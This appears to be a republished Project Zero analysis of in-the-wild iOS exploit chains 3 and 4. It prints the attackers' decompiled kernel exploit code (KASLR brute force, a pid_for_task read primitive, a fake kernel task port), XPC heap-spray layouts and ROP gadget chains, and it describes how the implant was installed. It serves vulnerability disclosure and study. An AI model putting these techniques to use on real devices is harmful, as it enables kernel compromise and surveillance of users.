The trick works like this: They pass the fake port's name as the clock_name argument to the trap. This name gets passed to port_name_to_clock, which verifies that the io_bits' KOTYPE field of the struct ipc_port is IKOT_CLOCK then returns the ip_kobject field, which is the pointer value at offset +0x68 in the fake port. That pointer is passed as the first argument to clock_sleep_internal, where it's compared against &clock_list[SYSTEM_CLOCK]:

  if (clock != &clock_list[SYSTEM_CLOCK])    return (KERN_FAILURE);
The insight in to the trick is two-fold: firstly, that the clock_list array resides in the kernel DATA segment and has the same KASLR slide applied to it as the rest of the kernel. Secondly, the only way that clock_sleep_trap can return KERN_FAILURE is if this comparison fails. All other error paths return different error codes.

Putting these two observations together it's possible to brute force KASLR. For the versions of iOS targeted by this exploit there were only 256 possible KASLR slides. So by creating a fake IKOT_CLOCK port and setting the ip_kobject field to each of the possible addresses of the system clock in the clock_list array in turn then calling the clock_sleep_trap mach trap and observing whether the return value isn't KERN_FAILURE it's possible to determine which guess was correct.

Here's their code which does that:

int current_slide_index = 0;char buf[0x1000];while (current_slide_index < 256) {  // empty the pipe  read(pipe_fds[2 * replacer_pipe_index],       buf,       0x1000uLL);
  // build a fake clock port  memset(buf, 0, 0x1000);  char* fake_port = &buf[offset_of_second_port_on_page];  *(uint32_t*)(fake_port+0x00) = 0x80000019;      // IO_ACTIVE | IKOT_CLOCK  *(uint32_t*)(fake_port+0x08) = 10;              // io_refs  // ip_kobject  *(uint64_t*)(fake_port+0x68) = system_clock_kaddr_unslid + (current_slide_index << 21);  *(uint32_t*)(fake_port+0xa0) = 10;              // msg count    // refill the pipe  write(pipe_bufs[(2 * replacer_pipe_index) + 1],        buf,        0xfff);
  if ( !(unsigned int)clock_sleep_trap(second_target_port, 0, 0, 0, 0)) {    // found it!    kernel_base = 0xfffffff007004000 + (current_slide_index << 21);    break;  }
This same trick and code is used in iOS Exploit Chains 2, 3 and 4.
kernel read and writeIn iOS Exploit Chain 1 we were introduced to the kernel task port; a port which granted, by design, kernel memory read and write access to anyone who had a send right to it. Using a memory corruption vulnerability the attackers were able to gain a send right to the real kernel task port, thereby very easily gaining the ability to modify kernel memory.

In iOS 10.3 a mitigation was introduced intended to prevent the kernel task port from being used by any userspace processes.

In convert_port_to_task, which will be called to convert a task port to the underlying struct task pointer, the following code was added:

  if (task == kernel_task && current_task() != kernel_task) {    ip_unlock(port);    return TASK_NULL;  }
This mitigation is easily bypassed by the attacker. By simply making a copy of the kernel task structure at a different kernel address the pointer comparison against kernel_task will fail and kernel memory read-write access will continue to work.

The prerequisite for this bypass is being able to read enough fields of the real kernel task structure in order to make a fake copy. For this they use the pid_for_task trick. I first used this trick after seeing it used in the yalu102 jailbreak; Stefen Esser claims to have been teaching it in his iOS exploitation classes since at least iOS 9.pid_for_taskThe prerequisites for this trick are the ability to craft a fake ipc_port structure and to be able to put controlled data at a known address. Given those two primitives it yields the ability to read a 32-bit value at an arbitrary, controlled address.

The trick is to build a fake task port (KOTYPE=IKOT_TASK) but instead of targeting the fields used by the mach_vm_read/write methods, target instead the pid_for_task trap. Here's the code for that trap circa iOS 10.3:

kern_return_tpid_for_task(struct pid_for_task_args *args){  mach_port_name_t t = args->t;  user_addr_t pid_addr  = args->pid;    ...  t1 = port_name_to_task(t);  ...  p = get_bsdtask_info(t1);  if (p) {    pid  = proc_pid(p);  ...  (void) copyout((char *) &pid, pid_addr, sizeof(int));  ...}
port_name_to_task will verify the KOTYPE field is IKOT_TASK then return the ip_kobject field. get_bsdtask_info returns the bsd_info field of the struct task:

void  *get_bsdtask_info(task_t t){ return(t->bsd_info);}
and proc_pid returns the p_pid field of struct proc:

intproc_pid(proc_t p){ if (p != NULL) return (p->p_pid);  ...}
In all the versions of iOS supported by this exploit the bsd_info field of struct task was at offset +0x360, and the p_pid field of struct proc was at offset +0x10.

Therefore, by pointing the ip_kobject field to controlled memory, then at offset 0x360 from there writing a pointer which points 0x10 bytes below the 32-bit value you wish to read it's possible to build a fake task port which will return a 32-bit value read from an arbitrary address when passed to the pid_for_task trap.

Here's their code setting that up:

uint32_tslow_kread_32(uint64_t kaddr,              mach_port_name_t dangling_port,              int *pipe_fds,              int offset_on_page_to_fake_port,              uint64_t pipe_buffer_kaddr):
{  char buf[0x1000] = {0};
  // empty pipe buffer  read(pipe_fds[0],       buf,       0x1000);
  // build the fake task struct on the opposite side of the page  // to the fake port  if ( offset_on_page_to_fake_port < 1792 )    offset_on_page_to_fake_task = 2048;
  // build the fake task port:  char* fake_ipc_port = &buf[offset_on_page_to_fake_port];  *(uint32_t*)(fake_ipc_port+0x00) = 0x80000002; // IO_ACTIVE | IKOT_PORT  *(uint32_t*)(fake_port+0x08)     = 10; // io_refs  // ip_kobject  *(uint64_t*)(fake_port+0x68) = pipe_buffer_kaddr + offset_on_page_to_fake_task;    char* fake_task = &buf[offset_on_page_to_fake_task];  *((uint32_t*)(fake_task + 0x10)  = 10; // task refs  *((uint64_t*)(fake_task + 0x360) = kaddr - 0x10; // 0x10 below target kaddr
  // refill pipe buffer  write(pipe_fds[1],        buf,        0xfff);
  pid_t pid = 0;;  pid_for_task(dangling_port, &pid);  return (uint32_t)pid;}
This technique will be used in all the subsequent exploit chains as an initial bootstrap kernel memory read function.
kernel memory writeThey first read a 32-bit value at the base of the kernel image. They are able to do this because they determined the KASLR slide, so by adding that to the unslid, hardcoded kernel image load address (0xfffffff007004000) they can determine the runtime base address of the kernel image. This read is presumably left over from testing however, as they don't do anything with the value which is read.
Using the offsets for this device and kernel version they read the address of the pointer to the kernel_task in the DATA segment, then read the entire task structure:

  for (int i3 = 0; i3 < 0x180; i3++) {    val = slow_kread_32(            kernel_task_address_runtime + 4 * i3,            second_target_port,            &pipe_fds[2 * replacer_pipe_index],            second_dangler_port_offset_on_page,            page_base_of_second_target_port);     *(_DWORD *)&fake_kernel_task[4 * i3] = val;  }
They read the pointer at +0xe8 in the task struct, which is itk_sself, a pointer to the real kernel task port. They then read out the contents of the whole real kernel task port:

  memset(fake_kernel_task_port, 0, 0x100);  for ( i4 = 0; i4 < 64; ++i4 ) {    v17 = slow_kread_32(            kernel_task_port_address_runtime + 4 * i4,            second_target_port,            &pipe_fds[2 * replacer_pipe_index],            second_dangler_port_offset_on_page,            page_base_of_second_target_port);    *(_DWORD *)&fake_kernel_task_port[4 * i4] = v17;  }
They make three changes to their copy of the kernel task port:

  // increase the reference count:  *(_DWORD *)&fake_kernel_task_port[4] = 0x2000;
  // pointer the ip_kobject pointer in to the pipe buffer  *(_QWORD *)&fake_kernel_task_port[0x68] = page_base_of_second_target_port + offset;
  // increase the sorights  *(_DWORD *)&fake_kernel_task_port[0xA0] = 0x2000;
They then copy that in to the buffer which will be written to the pipe at the offset of the dangling port:

  memset(replacer_page_contents, 0, 0x1000uLL);  memcpy(&replacer_page_contents[second_dangler_port_offset_on_page],         fake_kernel_task_port,         0xA8);
Then, to the half of the page which doesn't contain the port they write the fake kernel task:

  memcpy(&replacer_page_contents[other_side_index], fake_kernel_task, 0x600);

They write that back over the port (via the pipe buffer), creating a fake kernel task port which bypasses the kernel task port mitigation.

All of the subsequent kernel exploits in this series reuse this technique.
Post exploitationHaving gained kernel memory read/write access, they proceed as in iOS Exploit Chain 2 by finding the ucred's of launchd in order to unsandbox the current process. Their code has improved a little and they now restore the current process's original ucreds after spawning the implant.
Again they first have to patch the platform policy bytecode and add the hash of the implant to the trust cache.

The only major post-exploitation difference to the previous chain is that they now mark the device as having been successfully exploited. They check for the mark early during their kernel exploit and bail out if the exploit has already run.

Specifically they overwrite the boot arguments, passed by iBoot to the booting XNU kernel. This string can be read from inside the MobileSafari renderer sandbox. They add the string "iopl" to the bootargs, and at the start of the kernel exploit they read the bootargs and check for this string. If they find it, then this device has already been compromised and they don't need to continue with the exploit.

After posix_spawn'ing the implant binary they sleep for 1/10th of a second, reset their ucreds, drop their send right to the fake kernel task port, ping a server that they launched the implant and go into an infinite sleep.
Kategorie: Hacking & Security

In-the-wild iOS Exploit Chain 4

30 Srpen, 2019 - 02:04
Posted by Ian Beer, Project Zero

This exploit chain supported iOS 12-12.1, although the two vulnerabilities were unpatched when we discovered the chain in the wild. It was these two vulnerabilities which we reported to Apple with a 7-day deadline, leading to the release of iOS 12.1.4.

The sandbox escape vulnerability again involves XPC, though this time it's a particular daemon incorrectly managing the lifetime of an XPC object.  

It's the kernel bug used here which is, unfortunately, easy to find and exploit (if you don’t believe me, feel free to seek a second opinion!). An IOKit device driver with an external method which in the very first statement performs an unbounded memmove with a length argument directly controlled by the attacker:

IOReturnProvInfoIOKitUserClient::ucEncryptSUInfo(char* struct_in,                                         char* struct_out){  memmove(&struct_out[4],          &struct_in[4],          *(uint32_t*)&struct_in[0x7d4]);...
The contents of the struct_in buffer are completely attacker-controlled.

Similar to iOS Exploit Chain 3, it seems that testing and verification processes should have identified this exploit chain. 

In the detailed writeup towards the end of this series, we'll look at how the attackers exploited both these issues to install their implant and spy on users, and the capabilities of the real-time surveillance that it enabled.
In-the-wild iOS Exploit Chain 4 - cfprefsd + ProvInfoIOKittargets: 5s through X, 12.0 through 12.1 (vulnerabilities patched in 12.1.4)

iPhone6,1 (5s, N51AP)iPhone6,2 (5s, N53AP)iPhone7,1 (6 plus, N56AP)iPhone7,2 (6, N61AP)iPhone8,1 (6s, N71AP)iPhone8,2 (6s plus, N66AP)iPhone8,4 (SE, N69AP)iPhone9,1 (7, D10AP)iPhone9,2 (7 plus, D11AP)iPhone9,3 (7, D101AP)iPhone9,4 (7 plus, D111AP)iPhone10,1 (8, D20AP)iPhone10,2 (8 plus, D21AP)iPhone10,3 (X, D22AP)iPhone10,4 (8, D201AP)iPhone10,5 (8 plus, D211AP)iPhone10,6 (X, D221AP)

16A366 (12.0 - 17 Sep 2017)16A404 (12.0.1 - 8 Oct 2018)16B92 (12.1 - 30 Oct 2018)

first unsupported version 12.1.1 - 5 Dec 2018getting _start'edLike in iOS Exploit Chain 3, this privilege escalation binary doesn't rely on the system Mach-O loader to resolve dependencies, instead symbols are resolved when execution begins.

They terminate all the other threads running in this task, then check for their prior exploitation marker. Previously we've seen them add a string to the bootargs sysctl. They changed to a new technique this time:

  sysctl_value = 0;  value_size = 4;  sysctlbyname("kern.maxfilesperproc", &sysctl_value, &value_size, 0, 0);  if ( sysctl_value == 0x27FF )  {    while ( 1 )      sleep(1000LL);  }

If kern.maxfilesperproc has the value 0x27ff, then this device is considered to be already compromised, and the exploit stops.XPC againLike iOS Exploit Chain 3, this chain has separate sandbox escape and kernel exploits. The sandbox escape involves XPC again, but this time it's not core XPC code but a daemon incorrectly using the XPC API.Object lifetime management in XPCXPC has quite detailed man pages which cover the lifetime semantics of XPC objects. Here's a relevant snippet from $ man xpc_objects:

MEMORY MANAGEMENT     Objects returned by creation functions in the XPC framework may be uniformly retained and released with the functions xpc_retain() and xpc_release() respectively.
     The XPC framework does not guarantee that any given client has the last or only reference to a given object. Objects may be retained internally by the system.
     Functions which return objects follow the conventional create, copy and get naming rules:
  o create  A new object with a single reference is returned.            This reference should be released by the caller.  o copy    A copy or retained object reference is returned.            This reference should be released by the caller.  o get     An unretained reference to an existing object is returned.            The caller must not release this reference, and is responsible            for retaining the object for later use if necessary.
XPC objects are reference counted. xpc_retain can be called to manually take a reference, and xpc_release to drop a reference.  All XPC functions with copy in the name return an object with an extra reference to the caller and XPC functions with get in the name do not return an extra reference. The man page tells us that if we call an XPC function with get in the name "an unretained reference to an existing object is returned. The caller must not release this reference.'' A case of code doing exactly that is what we'll look at now.
cfprefsd is an XPC service hosted by the cfprefsd daemon. This daemon is unsandboxed and runs as root, and is directly reachable from the app sandbox and the WebContent sandbox.

The cfprefsd binary is just a stub, containing a single branch to __CFXPreferencesDaemon_main in the CoreFoundation framework. All the code is in the CoreFoundation framework.

__CFXPreferencesDaemon_main allocates a CFPrefsDaemon object which creates the XPC service listening on the default concurrent dispatch queue, giving it a block to execute for each incoming connection. Here's pseudo-Objective-C for the daemon setup code:

[CFPrefsDaemon initWithRole:role testMode] {  ...  listener =    xpc_connection_create_mach_service("",                                       0,                                       XPC_CONNECTION_MACH_SERVICE_LISTENER);
  xpc_connection_set_event_handler(listener, ^(xpc_object_t peer) {    if (xpc_get_type(peer) == XPC_TYPE_CONNECTION) {      xpc_connection_set_event_handler(peer, ^(xpc_object_t obj) {        if (xpc_get_type(obj) == XPC_TYPE_DICTIONARY) {          context_obj = xpc_connection_get_context(peer);          cfprefsd = context_obj.cfprefsd;          [cfprefsd handleMessage:obj fromPeer:peer replyHandler:            ^(xpc_object_t reply)            {              xpc_connection_send_message(peer, reply);            }];        }      }
      // move to a new queue:      char label[0x80];      pid_t pid = xpc_connection_get_pid(peer)      dispatch_queue_t queue;      int label_len = snprintf(label, 0x80, "Serving PID %d", pid);      if (label_len > 0x7e) {        queue = NULL;      } else {        queue = dispatch_queue_create(label, NULL);      }      xpc_connection_set_target_queue(peer, queue);
      context_obj = [[CFPrefsClientContext alloc] init];      context_obj.lock = 0;      context_obj.cfprefsd = self; // the CFPrefsDaemon object      context_obj.isPlatformBinary = -1; // char      context_obj.valid = 1;      xpc_connection_set_context(peer, context_obj);      xpc_connection_set_finalizer(peer, client_context_finalizer)      xpc_connection_resume(peer);    }  } }
This block creates a new serial dispatch queue for each connection and provides a block for each incoming message on the connection.

Each XPC message on a connection ends up being handled by [CFPrefsDaemon handleMessage:fromPeer:replyHandler:] :

-[CFPrefsDaemon handleMessage:msg fromPeer:peer replyHandler: handler] {  if (xpc_get_type(msg) == XPC_TYPE_ERROR) {    [self handleError:msg]  } else {    xpc_dictionary_get_value(msg, "connection", peer);    uint64_t op = xpc_dictionary_get_uint64(msg, "CFPreferencesOperation");    switch (op) {     case 1:     case 7:     case 8:      [self handleSourceMessage:msg replyHandler:handler];      break;     case 2:      [self handleAgentCheckInMessage:msg replyHandler:handler];      break;     case 3:      [self handleFlushManagedMessage:msg replyHandler:handler];      break;     case 4:      [self handleFlushSourceForDomainMessage:msg replyHandler:handler];      break;     case 5:      [self handleMultiMessage:msg replyHandler:handler];      break;     case 6:      [self handleUserDeletedMessage:msg replyHandler:handler];      break;     default:      // send error reply    }  }}
handleMultiMessage sounds like the most interesting one; here's the pseudocode:

-[CFPrefsDaemon handleMultiMessage:msg replyHandler: handler]{  xpc_object_t peer = xpc_dictionary_get_remote_connection(msg);  // ...  xpc_object_t messages = xpc_dictionary_get_value(msg, "CFPreferencesMessages");  if (!messages || xpc_get_type(messages) != OS_xpc_array) {    // send error message  }
  // may only contain dictionaries or nulls:  bool all_types_valid = xpc_array_apply(messages, ^(xpc_object_t entry) {    xpc_type_t type = xpc_get_type(entry);    return (type == XPC_TYPE_DICTIONARY || type == XPC_TYPE_NULL)  };
  if (!all_types_valid) {    // return error  }
  size_t n_sub_messages = xpc_array_get_count(messages);
  // macro from CFInternal.h  // allocates either on the stack or heap  new_id_array(sub_messages, n_sub_messages);
  if (n_sub_messages > 0) {    for (size_t i = 0; i < n_sub_messages; i++) {      // raw pointers, not holding a reference      sub_messages[i] = xpc_array_get_value(messages, i);    }
    for (size_t i = 0; i < n_sub_messages; i++) {      if (xpc_get_type(sub_messages[i]) == XPC_TYPE_DICTIONARY) {        [self handleMessage: sub_messages[i]              fromPeer: peer              replyHandler: ^(xpc_object_t reply) {                sub_messages[i] = xpc_retain(reply);              }];      }    }  }
  xpc_object_t reply = xpc_dictionary_create_reply(msg);  xpc_object_t replies_arr = xpc_array_create(sub_messages, n_sub_messages);  xpc_dictionary_set_value(reply, "CFPreferencesMessages", replies_arr);
  if (n_sub_messages) {    for (size_t i = 0; i < n_sub_messages; i++) {      if (xpc_get_type(sub_messages[i]) != XPC_TYPE_NULL) {        xpc_release(sub_messages[i]);      }    }  }
The multiMessage handler is expecting the input message to be an xpc_array of xpc_dictionary objects, which would be the sub-messages to process. It pulls each of them out of the input xpc_array with xpc_array_get_value and passes them to the handleMessage method but with a different replyHandler block which, rather than immediately sending the reply message back to the client, instead overwrites the input sub-message pointer in the sub_messages array with the reply. When all the sub-messages have been processed they create an xpc_array from all the replies and invoke the replyHandler passed to this function passing a reply message containing an xpc_array of sub-message replies.

The bug here is slightly subtle. If we imagine that there is no multiMessage, then the semantics of the replyHandler block which gets passed to each message handler are: "invoke me to send a reply". Hence the name "replyHandler". For example, message type 3 is handled by handleFlushManagedMessage, which invokes the replyHandler block to return a reply.

However not all of the message types expect to send a reply. Think of them like void functions in C; they have no return value. Since they don't return a value, they don't send a reply message. And that means that they don't invoke the replyHandler block. Why would you invoke a block called replyHandler if you had no reply to send?

The problem is that multiMessage has changed the semantics of the replyHandler block; multiMessage's replyHandler block takes a reference on the reply object and overwrites the input message object in the sub_messages array:

    for (size_t i = 0; i < n_sub_messages; i++) {      if (xpc_get_type(sub_messages[i]) == XPC_TYPE_DICTIONARY) {        [self handleMessage: sub_messages[i]              fromPeer: peer              replyHandler: ^(xpc_object_t reply) {                sub_messages[i] = xpc_retain(reply);              }];      }    }
But as we saw, there's no guarantee that the replyHandler block is going to be invoked at all; in fact some of the message handlers are just NOPs and do nothing at all.

This becomes a problem because the multiMessage replyHandler block changes the lifetime semantics of the pointers stored in the sub_messages array. When the sub_messages array is initialized it stores raw, unretained pointers, returned by an xpc_*get* method:

    for (size_t i = 0; i < n_sub_messages; i++) {      // raw pointers, not holding a reference      sub_messages[i] = xpc_array_get_value(messages, i);    }
xpc_array_get_value returns the raw pointer at the given offset in the xpc_array. It doesn't return a pointer holding a new reference. Therefore it's not valid to use that pointer beyond the lifetime of the messages xpc_array. The replyHandler block then reuses the sub_messages array to store the replies to each of the sub-messages, but this time it takes a reference on the reply objects it stores in there:

    for (size_t i = 0; i < n_sub_messages; i++) {      if (xpc_get_type(sub_messages[i]) == XPC_TYPE_DICTIONARY) {        [self handleMessage: sub_messages[i]              fromPeer: peer              replyHandler: ^(xpc_object_t reply) {                sub_messages[i] = xpc_retain(reply);              }];      }    }
Once all the sub_messages have been handled they attempt to release all of the replies:

  if (n_sub_messages) {    for (size_t i = 0; i < n_sub_messages; i++) {      if (xpc_get_type(sub_messages[i]) != XPC_TYPE_NULL) {        xpc_release(sub_messages[i]);      }    }  }
If there were a sub-message which didn't invoke the replyHandler block, then this loop would xpc_release the input sub-message xpc_dictionary, returned via xpc_array_get_value, rather than a reply. As we know, xpc_array_get_value doesn't return a reference, so this would lead to a reference being dropped when none was taken. Since the only reference to the sub-message xpc_dictionary is held by the xpc_dictionary containing the request message, the xpc_release here will free the sub-message xpc_dictionary, leaving a dangling pointer in the request message xpc_dictionary. When that dictionary is released, it will call xpc_release on the sub-message dictionary again, causing an Objective-C selector to be sent to a free'd object.
ExploitationLike iOS Exploit Chain 3, they also choose a heap and port spray strategy here. But they don't use a resource leak primitive, instead sending everything in the XPC trigger message itself.Exploit flowThe exploit strategy here is to reallocate the free'd xpc_dictionary in the gap between the xpc_release when destroying the sub_messages and the xpc_release of the outer request message. They do this by using four threads, running in parallel. Threads A, B and C start up and wait for a global variable to be set to 1. When that happens they each try 100 times to send the following XPC message to the service:

{ "CFPreferencesOperation": 5,  "CFPreferencesMessages" : [10'000 * xpc_data_spray] }
where xpc_data_spray is a 448-byte xpc_data buffer filled with the qword value 0x118080000. This is the target address to which they will try to heapspray. They are hoping that the contents of one of these xpc_data's 448-byte backing buffers will overlap with the free'd xpc_dictionary, completely filling the memory with the heapspray address.

As we saw in [CFPrefsDaemon handleMultiMessage:replyHandler] this is not a valid multiMessage; the CFPreferencesMessage array may only contain dictionaries or NULLs. Nevertheless, it will take some time for all these xpc_data objects to be created, handleMultiMessage to run, fail and the xpc_data objects to be destroyed. They are hoping that with three threads trying this in parallel this replacement strategy will be good enough.
Trigger messageThe bug will be triggered by a sub-message with an operation key mapping to a handler which doesn't invoke its reply block. They chose operation 4, handled by handleFlushSourceForDomainMessage. The trigger message looks like this:

{ "CFPreferencesOperation": 5  "CFPreferencesMessages" :    [      8000 * (op_1_dict, second_op_5_dict),      150 * (second_op_5_dict, op_4_dict, op_4_dict, op_4_dict),      third_op_5_dict    ]}
where the sub-message dictionaries are:

op_1_dict = {  "CFPreferencesOperation": 1,  "domain": "a",  "A": 8_byte_xpc_data}
second_op_5_dict = {  "CFPreferencesOperation": 5}
op_4_dict = {  "CFPreferencesOperation": 4}
third_op_5_dict = {  "CFPreferencesOperation": 5  "CFPreferencesMessages" : [0x2000 * xpc_send_right,                             0x10 * xpc_data_heapspray]}
On 4k devices the heapspray xpc_data object is around 25MB, on 16k devices with more RAM it's around 30MB. They put 16 of them in the message, leading to 400MB of sprayed virtual address space on 4k and 500MB or so on 16k devices.
PC controlThe racer threads are trying to refill free'd memory with the repeated pointer value 0x118080000. If things work out xpc_release will be called on an xpc_dictionary which is filled with that value.

What does xpc_release actually do? The first qword of an Objective-C object is its isa pointer. This is a pointer to the class object which defines the object's type. In xpc_release they check whether the isa points inside libxpc's __objc_data section. If so, it calls os_object_release. Since they've supplied a fake isa pointer (with the value 0x118080000) the other branch will be taken, calling objc_release. If the FAST_ALLOC bit is clear in the class object's bits field (bit 2 in the byte at offset 0x20) then this will result in the release selector being sent to the object, which is what will happen in this case:fake selector cache technique

Building a fake Objective-C object to gain PC control when a selector is sent to it like this is a known technique. obj_msgSend is the native function responsible for handling selector invocations. It will first follow the isa pointer to the class object, then follow the pointer at +0x10 in there to a selector cache structure, which is an array of (function_pointer, selector) pairs; if the target selector matches an entry in the cache, then the cached function pointer is called.Full controlAt the point they gain PC control X0 points to the free'd xpc_dictionary object. In the previous chain which also had a sandbox escape they were able to quite easily pivot the stack by JOP'ing to longjmp. In iOS 12 Apple added some hardening to longjmp, on both the A12 using PAC and A11 and earlier devices without PAC. Those devices are not supported by these exploits (though the exploits can be relatively easily ported to work on them).

Here's longjmp in iOS 12 for A11 and below:

__longjmpMRS    X16, #3, c13, c0, #3 ; read TPIDRRO_EL0AND    X16, X16, #0xFFFFFFFFFFFFFFF8LDR    X16, [X16,#0x38] ; read a key from field 7                        ; in the thread descriptorLDP    X19, X20, [X0]LDP    X21, X22, [X0,#0x10]LDP    X23, X24, [X0,#0x20]LDP    X25, X26, [X0,#0x30]LDP    X27, X28, [X0,#0x40]LDP    X10, X11, [X0,#0x50]LDR    X12, [X0,#0x60]LDP    D8, D9, [X0,#0x70]LDP    D10, D11, [X0,#0x80]LDP    D12, D13, [X0,#0x90]LDP    D14, D15, [X0,#0xA0]EOR    X29, X10, X16    ; use the key to XOR FP, LR and SPEOR    X30, X11, X16EOR    X12, X12, X16MOV    SP, X12CMP    W1, #0CSINC  W0, W1, WZR, NERET
We looked at longjmp in iOS 11 for the iOS Exploit Chain 3 sandbox escape. The addition here in iOS 12 on A11 and below is the reading of a key from the thread local storage area and its use to XOR the LR, SP and FP registers.

Those first three instructions are the _OS_PTR_MUNGE_TOKEN macro from libsyscall:

#define _OS_PTR_MUNGE_TOKEN(_reg, _token) \ mrs _reg, TPIDRRO_EL0 %% \ and _reg, _reg, #~0x7 %% \ ldr _token, [ _reg,  #_OS_TSD_OFFSET(__TSD_PTR_MUNGE) ]
This is reading from the TPIDRRO_EL0 system register (Read-Only Software Thread ID Register) which XNU points to the userspace thread local storage area. The key value is passed to new processes on exec via the special apple[] argument to main, generated here during exec:

/* * Supply libpthread & libplatform with a random value to use for pointer * obfuscation. */error = exec_add_entropy_key(imgp, PTR_MUNGE_KEY, PTR_MUNGE_VALUES, FALSE);
Fundamentally, the use of longjmp in iOS Exploit Chain 3 was just a technique; it was nothing fundamental to the exploit chain. longjmp was just a very convenient way to pivot the stack and gain full register control. Let's see how the attackers pivot the stack anyway, without the use of longjmp:

Here's gadget_0, which will be read from the fake Objective-C selector cache object. X0 will point to the dangling xpc_dictionary object which is filled with 0x118080000:

gadget_0:LDR  X0, [X0,#0x18] ; X0 := (*(dangling_ptr+0x18)) (= 0x118080000)LDR  X1, [X0,#0x40] ; X1 := (*(0x118080040)) (= gadget_1_addr)BR   X1           ; jump to gadget_1
gadget_0 gives them X0 pointing to the heap-sprayed object, and branches to gadget_1:

gadget_1:LDR  X0, [X0]       ; X0 := (*(0x118080000)) (= 0x118080040)LDR  X4, [X0,#0x10] ; X4 = *(0x118080050) (= gadget_2_addr)BR   X4           ; jump to gadget_2
gadget_1 gets a new, controlled value for X0 and jumps to gadget_2:

gadget_2:LDP  X8, X1, [X0,#0x20] ; X8 := *(0x118080060) (=0x1180900c0)                        ; X1 := *(0x118080068) (=gadget_4_addr)LDP  X2, X0, [X8,#0x20] ; X2 := *(0x1180900e0) (=gadget_3_addr)                        ; X0 := *(0x1180900e8) (=0x118080070)BR   X2               ; jump to gadget_3
gadget_2 gets control of X0 and X8 and jumps to gadget_3:

gadget_3:STP  X8, X1, [SP]        ; *(SP) = 0x1180900c0                         ; *(SP+8) = gadget_4_addrLDR  X8, [X0]            ; X8 := *(0x118080070) (=0x118080020)LDR  X8, [X8,#0x60]      ; X8 := *(0x118080080) (=gadget_4_addr+4)MOV  X1, SP              ; X1 := real stackBLR  X8 ; jump to gadget 4+4
gadget_3 stores X8 and X1 to the real stack, creating a fake stack frame with a controlled value for the saved frame pointer (0x1180900c0) and a controlled return address (gadget_4_addr.) It then jumps to gadget_4+4:

gadget_4+4:LDP X29, X30, [SP],#0x10 ; X29 := *(SP)   (=0x1180900c0)                         ; X30 := *(SP+8) (=gadget_4_addr)                         ; SP += 0x10RET ; jump to LR (X30), gadget_4:
This loads the frame pointer and link register from the real stack, from the addresses where they just wrote controlled values. This gives them arbitrary control of the frame pointer and link register. The RET jumps to the value in the link register, which is gadget_4:

gadget_4:MOV  SP, X29              ; SP := X29 (=0x1180900c0)LDP  X29, X30, [SP],#0x10 ; X29 := *(0x1180900c0) (=UNINIT)                          ; X30 := *(0x1180900c8) (gadget_5_addr)                          ; SP += 0x10 (SP := 0x1180900d0)RET                       ; jump to LR (X30), gadget_5
This moves their controlled frame pointer into the stack pointer register, loads new values for the frame pointer and link register from there and RETs to gadget_5, having successfully pivoted to a controlled stack pointer. The ROP stack from here on is very similar to PE3's sandbox escape stack; they use the same LOAD_ARGS gadget to load X0-X7 before each target function they want to call:

gadget_5: (LOAD_ARGS)LDP   X0, X1, [SP,#0x80]LDP   X2, X3, [SP,#0x90]LDP   X4, X5, [SP,#0xA0]LDP   X6, X7, [SP,#0xB0]LDR   X8, [SP,#0xC0]MOV   SP, X29LDP   X29, X30, [SP],#0x10RET
They also use the same memory_write gadget:

gadget_6: (MEMORY_WRITE)LDR             X8, [SP]STR             X0, [X8,#0x10]LDP             X29, X30, [SP,#0x20]ADD             SP, SP, #0x30RET
See the writeup for iOS Exploit Chain 3 for an annotated breakdown of how the ROP stack using these gadgets works. It proceeds in a very similar way to iOS Exploit Chain 3; calling IOServiceMatching, IOServiceGetMatchingService then IOServiceOpen to get an IOKit UserClient mach port send right. They use the memory write gadget to write that port name to the four exfil messages, which they send in succession. In the WebContent process they listen on the portset for a message. If they receive a message, it's got a ProvInfoIOKitUserClient send right in it.
Kernel vulnerabilityThe sandbox escape sent back a connection to the ProvInfoIOKitUserClient user client class, present since at least iOS 10.

This class exposes an interface to userspace by overriding getTargetAndMethodForIndex, providing 6 external methods. getTargetAndMethod returns a pointer to an IOExternalMethod structure which describes the type and size of the expected inputs and outputs.

External method 5 is ucEncryptSUInfo, which takes a 0x7d8 byte structure input and returns a 0x7d8 byte structure output. These sizes are verified by the base IOUserClient class's implementation of IOUserClient::externalMethod; attempting to pass other sizes of input or output structure will fail.

This is the very first statement in ProvInfoIOKitUserClient::ucEncryptSUInfo, I haven't trimmed anything from the start of this function. struct_in points to a buffer of 0x7d8 attacker controlled bytes. As seen in the introduction above:

IOReturnProvInfoIOKitUserClient::ucEncryptSUInfo(char* struct_in,                                         char* struct_out){  memmove(&struct_out[4],          &struct_in[4],          *(uint32_t*)&struct_in[0x7d4]);...
IOKit external methods are akin to syscalls; the arguments are untrusted at this boundary. The very first statement in this external method is a memmove operation with a trivially user-controlled length argument.
Kernel exploitationThe start of the kernel exploit is the same as usual: get the correct kernel offsets for this device and create an IOSurfaceRootUserClient for attaching arbitrary OSObjects. They allocate the 0x800 pipes (first increasing the open files limit) and 1024 early ports.

Then they allocate 768 ports, split into four groups like this:

for ( i = 0; i < 192; ++i ) {  mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports_a[i]);  mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports_b[i]);  mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports_c[i]);  mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports_d[i]);}
Then a further five standalone ports:

mach_port_allocate((unsigned int)mach_task_self_, 1LL,                   &port_for_more_complex_kallocer);mach_port_allocate((unsigned int)mach_task_self_, 1LL, &single_port_b);mach_port_allocate((unsigned int)mach_task_self_, 1LL, &single_port_c);mach_port_allocate((unsigned int)mach_task_self_, 1LL, &single_port_d);mach_port_allocate((unsigned int)mach_task_self_, 1LL,                   &first_kalloc_groomer_port);
They use a kalloc_groomer message to make 25600 kalloc.4096 allocations, then force a GC using the same new technique as iOS Exploit Chain 3.

They allocate 10240 before_ports, a target_port, and 5120 after_ports. This is again a carbon-copy of every which we've seen in the previous chains. It seems like they're setting up for giving themselves a dangling pointer to target_port, doing a zone transfer into kalloc.4096 and building a fake kernel task port.

They send a more complex kalloc_groomer which will make 1024 kalloc.4096 allocations followed by 1024 kalloc.6144 allocations. This fills in gaps in both those zones.

96 times they alternately send an out-of-line ports descriptor with 0x200 entries to a port from ports_a[] then a kalloc.4096 groomer to a port from ports_c[].

